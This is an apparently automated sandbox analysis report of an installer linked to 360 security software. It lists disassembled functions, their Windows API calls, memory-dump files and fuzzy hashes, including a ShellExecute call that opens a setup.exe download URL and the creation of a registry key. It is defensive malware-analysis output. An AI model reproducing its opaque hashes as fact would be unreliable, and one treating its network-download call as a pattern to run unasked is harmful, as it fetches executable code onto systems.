                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4158576782.000000005F4D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158731034.000000005F54F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F56F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F575000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F57A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F5BC000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4159004826.000000005F5BF000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateThread
                                                                                                                                                                      • String ID: tr.p.360.cn
                                                                                                                                                                      • API String ID: 2422867632-613191693
                                                                                                                                                                      • Opcode ID: f1012bb88f209f16c3fbb37e6335f2b13683bfc81781e8f652744638dd1d9f6e
                                                                                                                                                                      • Instruction ID: 0dcd63d4e25ed67fade0e55a0c96621825fdfc1faf936b75fea9652900770c3d
                                                                                                                                                                      • Opcode Fuzzy Hash: f1012bb88f209f16c3fbb37e6335f2b13683bfc81781e8f652744638dd1d9f6e
                                                                                                                                                                      • Instruction Fuzzy Hash: 7D0184B1012346FEDB148F21CC40AEB73EDEF463A4F00453EE55586180EBB17651CBA1
                                                                                                                                                                      Function 0017BFF4 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: H_prolog3
                                                                                                                                                                      • String ID: CAB
                                                                                                                                                                      • API String ID: 431132790-4230853747
                                                                                                                                                                      • Opcode ID: e6dc2f4ce4aec376a9195003ad1a22b0c7826eb0421be2965a73589126daa4ce
                                                                                                                                                                      • Instruction ID: db595ac8150f2f310a825f7e61c0510ffb1e03f38c0528f6fb1cc017d5e5e9d0
                                                                                                                                                                      • Opcode Fuzzy Hash: e6dc2f4ce4aec376a9195003ad1a22b0c7826eb0421be2965a73589126daa4ce
                                                                                                                                                                      • Instruction Fuzzy Hash: D7F06839A00216D7DB15EAB08D03FEE76309F31B54F10422CB615B61D1EB609E82D6C4
                                                                                                                                                                      Function 0016E7D0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 28libraryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • LoadLibraryW.KERNEL32(?,?,00000001,00000000,?,00000000,?,0016E9A6,?), ref: 0016E80F
                                                                                                                                                                        • Part of subcall function 0016E9E0: _memset.LIBCMT ref: 0016EA12
                                                                                                                                                                        • Part of subcall function 0016E9E0: _wcsncpy.LIBCMT ref: 0016EA29
                                                                                                                                                                        • Part of subcall function 0016E9E0: _wcsncat.LIBCMT ref: 0016EA3C
                                                                                                                                                                        • Part of subcall function 0016E9E0: _wcsncat.LIBCMT ref: 0016EA53
                                                                                                                                                                        • Part of subcall function 0016E9E0: _wcsncat.LIBCMT ref: 0016EA66
                                                                                                                                                                        • Part of subcall function 0016E9E0: _wcsncat.LIBCMT ref: 0016EA7D
                                                                                                                                                                        • Part of subcall function 0016E9E0: _wcsncat.LIBCMT ref: 0016EA90
                                                                                                                                                                        • Part of subcall function 0016E9E0: _wcsncat.LIBCMT ref: 0016EAA7
                                                                                                                                                                        • Part of subcall function 0016E9E0: GetActiveWindow.USER32 ref: 0016EAB7
                                                                                                                                                                        • Part of subcall function 0016E9E0: MessageBoxW.USER32(00000000), ref: 0016EABE
                                                                                                                                                                        • Part of subcall function 0016E9E0: __wcsnicmp.LIBCMT ref: 0016EADA
                                                                                                                                                                        • Part of subcall function 0016E9E0: ShellExecuteW.SHELL32(00000000,open,http://down.360safe.com/setup.exe,00000000,00000000,00000005), ref: 0016EB0E
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _wcsncat$ActiveExecuteLibraryLoadMessageShellWindow__wcsnicmp_memset_wcsncpy
                                                                                                                                                                      • String ID: 360
                                                                                                                                                                      • API String ID: 4220467963-1990796034
                                                                                                                                                                      • Opcode ID: 0daacb52c995f898c6dc3ac23948c9c3f62079a59a8a380d5c0714e9d740dab5
                                                                                                                                                                      • Instruction ID: 78719a176e1c786c690501850701b02bfc508f001165937c57c3c6d1d2bd7fde
                                                                                                                                                                      • Opcode Fuzzy Hash: 0daacb52c995f898c6dc3ac23948c9c3f62079a59a8a380d5c0714e9d740dab5
                                                                                                                                                                      • Instruction Fuzzy Hash: 2CE0D8762553107AEA10A610AC0AFDBA7CC9F60759F10883BF605E2080FBB0983087A6
                                                                                                                                                                      Function 5F516F06 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 25registryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • RegCreateKeyExW.KERNEL32(80000001,SOFTWARE\LiveUpdate360,00000000,00000000,00000000,000F003F,00000000,5F4FD3A2,?,?,?,?,5F4FD3A2), ref: 5F516F2E
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4158576782.000000005F4D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158731034.000000005F54F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F56F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F575000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F57A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F5BC000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4159004826.000000005F5BF000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Create
                                                                                                                                                                      • String ID: SOFTWARE\LiveUpdate360
                                                                                                                                                                      • API String ID: 2289755597-1248664019
                                                                                                                                                                      • Opcode ID: 988951a36cb3adc50dabce46b0a588efb252e8c04377737fffd2e0e8c0899428
                                                                                                                                                                      • Instruction ID: 7dbaafc910dac5e740a4e2f7d3cc83f28a2238b411e9a7b079184c7eaeed7cca
                                                                                                                                                                      • Opcode Fuzzy Hash: 988951a36cb3adc50dabce46b0a588efb252e8c04377737fffd2e0e8c0899428
                                                                                                                                                                      • Instruction Fuzzy Hash: D7E0B6F6A64109BFEB08CBA4DD46DFE7AACDB14244F104259BA06E2141E975AA449620
                                                                                                                                                                      Function 00164410 Relevance: 3.2, APIs: 2, Instructions: 226COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000,00000000,?,00000CCC,?,00164728,00000000,00000000,00000CCC,00000040), ref: 00164576
                                                                                                                                                                        • Part of subcall function 00163E90: ReadFile.KERNEL32(?,?,?,?,00000000,?,00164DC5,?,00000000,?,00000000,?,?,00161043,?), ref: 00163E9B
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: File$PointerRead
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3154509469-0
                                                                                                                                                                      • Opcode ID: 2094f488d1bdb8da0db0bfcf0356147e6faeeb32d4b34c35812387cbe8e9724c
                                                                                                                                                                      • Instruction ID: 8caa77b898d251b2fa0c88224e01e72057c11c270c095ee7e555cae8b130649e
                                                                                                                                                                      • Opcode Fuzzy Hash: 2094f488d1bdb8da0db0bfcf0356147e6faeeb32d4b34c35812387cbe8e9724c
                                                                                                                                                                      • Instruction Fuzzy Hash: 83716971604702AFD718DF28DC91A2AB3E5FB88310F558A2DF859C3740E735E9648BD2
                                                                                                                                                                      Function 00198119 Relevance: 3.1, APIs: 2, Instructions: 141COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ClientRectShowWindow
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2134488367-0
                                                                                                                                                                      • Opcode ID: 045c0c5e4333fc2ecdb3ba64f303d9d8ed36df7734941c6bd3d95d52fb660a06
                                                                                                                                                                      • Instruction ID: 0e74a70b185087ff467d03f1e9493c9e21ea4ef4e41d5718f176c052ebd47479
                                                                                                                                                                      • Opcode Fuzzy Hash: 045c0c5e4333fc2ecdb3ba64f303d9d8ed36df7734941c6bd3d95d52fb660a06
                                                                                                                                                                      • Instruction Fuzzy Hash: 5B512D70900209AFCF11DFA4C888DAEBBB8FF59344B144469F846DB261EB35DA46CF60
                                                                                                                                                                      Function 001EF350 Relevance: 3.1, APIs: 2, Instructions: 137COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • __flush.LIBCMT ref: 001EF414
                                                                                                                                                                      • __fileno.LIBCMT ref: 001EF434
                                                                                                                                                                        • Part of subcall function 001E98D1: __getptd_noexit.LIBCMT ref: 001E98D1
                                                                                                                                                                        • Part of subcall function 001EA5B1: __decode_pointer.LIBCMT ref: 001EA5BC
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: __decode_pointer__fileno__flush__getptd_noexit
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3967789316-0
                                                                                                                                                                      • Opcode ID: 9cd4b0d52be28c8fbd5dda615404ac9080e8322edafad2a7ae5bd0cfe971db06
                                                                                                                                                                      • Instruction ID: 84273fa0078889141ce98d33b14816712305b5ed7e94c3ab39de78817f3c484c
                                                                                                                                                                      • Opcode Fuzzy Hash: 9cd4b0d52be28c8fbd5dda615404ac9080e8322edafad2a7ae5bd0cfe971db06
                                                                                                                                                                      • Instruction Fuzzy Hash: E7418231A00E859BDB249FAB88845AFB7B6BF90320F29857DEC15975C0E770DE42CB40
                                                                                                                                                                      Function 00165B50 Relevance: 3.1, APIs: 2, Instructions: 102COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetFileSizeEx.KERNEL32(?,?,?,00000000,?,?,?), ref: 00165B70
                                                                                                                                                                      • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000,?,?,?,00000000,?,?,?), ref: 00165BC9
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: File$PointerSize
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3549600656-0
                                                                                                                                                                      • Opcode ID: 2321a5ba33563ca5ef61c9f2f634c8d2569485ea194610927d257296cd6f012d
                                                                                                                                                                      • Instruction ID: 2e86adf3b5e6d2464a6825f08baf6b9b415004130f003ffd9d5ece43c9ad6dc0
                                                                                                                                                                      • Opcode Fuzzy Hash: 2321a5ba33563ca5ef61c9f2f634c8d2569485ea194610927d257296cd6f012d
                                                                                                                                                                      • Instruction Fuzzy Hash: 2421D0327043095BD710AE6AFC80A5AB3DAEBD5751F59443AE948C3240EB36EC198772
                                                                                                                                                                      Function 001D0001 Relevance: 3.1, APIs: 2, Instructions: 100fileCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • WriteFile.KERNEL32(?,?,00001000,?,00000000), ref: 001D00AC
                                                                                                                                                                      • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 001D00EF
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FileWrite
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3934441357-0
                                                                                                                                                                      • Opcode ID: c861ef3b06f9678ed526e1c81eaf9c0237d964e12804038403813ee776603c9f
                                                                                                                                                                      • Instruction ID: cb9d82be945fbfc36ba7c00af7036dbe47c4dcc8757a2767ce44083a85b8d511
                                                                                                                                                                      • Opcode Fuzzy Hash: c861ef3b06f9678ed526e1c81eaf9c0237d964e12804038403813ee776603c9f
                                                                                                                                                                      • Instruction Fuzzy Hash: 22315B71A002599FDB35CEA5CC44BEEB779FF49354F25443AE858E7282DB3099058B50
                                                                                                                                                                      Function 5F50AE39 Relevance: 3.1, APIs: 2, Instructions: 91networkCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 5F50AE44
                                                                                                                                                                        • Part of subcall function 5F506EF2: GetTickCount.KERNEL32 ref: 5F506EFF
                                                                                                                                                                      • WSAGetLastError.WS2_32 ref: 5F50AEAE
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4158576782.000000005F4D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158731034.000000005F54F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F56F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F575000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F57A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F5BC000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4159004826.000000005F5BF000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CountTick$ErrorLast
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1305442257-0
                                                                                                                                                                      • Opcode ID: 1a9b8a114ee3744a0f72e12e6326197eb640f47b96dcf343c299d5aa22bcbf5a
                                                                                                                                                                      • Instruction ID: 5f52b93c2c4e9709931c39aa76f132063e9f829fc54cb352b1e2df6ec049366a
                                                                                                                                                                      • Opcode Fuzzy Hash: 1a9b8a114ee3744a0f72e12e6326197eb640f47b96dcf343c299d5aa22bcbf5a
                                                                                                                                                                      • Instruction Fuzzy Hash: BB3170B5A01205BFCB15ABE4C898EEFBBADBF44354F00456AF21697290DB30A954CB90
                                                                                                                                                                      Function 5F4D867B Relevance: 3.1, APIs: 2, Instructions: 62COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4158576782.000000005F4D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158731034.000000005F54F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F56F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F575000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F57A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F5BC000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4159004826.000000005F5BF000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: H_prolog3_catchchar_traits
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1964944973-0
                                                                                                                                                                      • Opcode ID: 34970f05a2a06452c3580e753e4bc36315ba7f2972c92aa8ad81c298e8241192
                                                                                                                                                                      • Instruction ID: 180450034fefa4b5a86ebf51be3a82113c546ad1d19e4df79b8efa5da39cd845
                                                                                                                                                                      • Opcode Fuzzy Hash: 34970f05a2a06452c3580e753e4bc36315ba7f2972c92aa8ad81c298e8241192
                                                                                                                                                                      • Instruction Fuzzy Hash: 1E11B9B1A05205ABDB04CF948870BAEB7B6BF94720F20861AF525EB6C0D771BA50C7D1
                                                                                                                                                                      Function 5F4D878F Relevance: 3.1, APIs: 2, Instructions: 61COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4158576782.000000005F4D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158731034.000000005F54F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F56F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F575000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F57A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F5BC000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4159004826.000000005F5BF000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: H_prolog3_catchchar_traits
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1964944973-0
                                                                                                                                                                      • Opcode ID: 7d2e8343a2037b3f05713f143c40eb6e11d058b8697f223def36a34ddc3b1875
                                                                                                                                                                      • Instruction ID: 390fc2536fdcbc4dfb70f03d04b7d13876bf1c8314b023fdcdbafea8aee8718c
                                                                                                                                                                      • Opcode Fuzzy Hash: 7d2e8343a2037b3f05713f143c40eb6e11d058b8697f223def36a34ddc3b1875
                                                                                                                                                                      • Instruction Fuzzy Hash: 241172B1A01205EBDB04CFA488707AEB3A6BB94311F20861AF515D7680C771BA51CBD1
                                                                                                                                                                      Function 001B20A9 Relevance: 3.1, APIs: 2, Instructions: 57COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • __EH_prolog3_GS.LIBCMT ref: 001B20B3
                                                                                                                                                                        • Part of subcall function 00197451: BeginPaint.USER32(?,?), ref: 0019746E
                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 001B20E0
                                                                                                                                                                        • Part of subcall function 00197323: CreateCompatibleDC.GDI32(?), ref: 00197347
                                                                                                                                                                        • Part of subcall function 00197323: SelectObject.GDI32(?,?), ref: 0019736E
                                                                                                                                                                        • Part of subcall function 00197323: SetViewportOrgEx.GDI32(?,?,?,00000000), ref: 00197387
                                                                                                                                                                        • Part of subcall function 001A6537: GetWindowRect.USER32(?,00000000), ref: 001A6554
                                                                                                                                                                        • Part of subcall function 001B1F15: __EH_prolog3.LIBCMT ref: 001B1F1C
                                                                                                                                                                        • Part of subcall function 001B1F15: IsWindowEnabled.USER32(?), ref: 001B1F26
                                                                                                                                                                        • Part of subcall function 001B1F15: GetClientRect.USER32(?,?), ref: 001B1F5D
                                                                                                                                                                        • Part of subcall function 001B1F15: GetWindowTextW.USER32(?,00000000,00000080), ref: 001B1FA2
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: RectWindow$Client$BeginCompatibleCreateEnabledH_prolog3H_prolog3_ObjectPaintSelectTextViewport
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2602395704-0
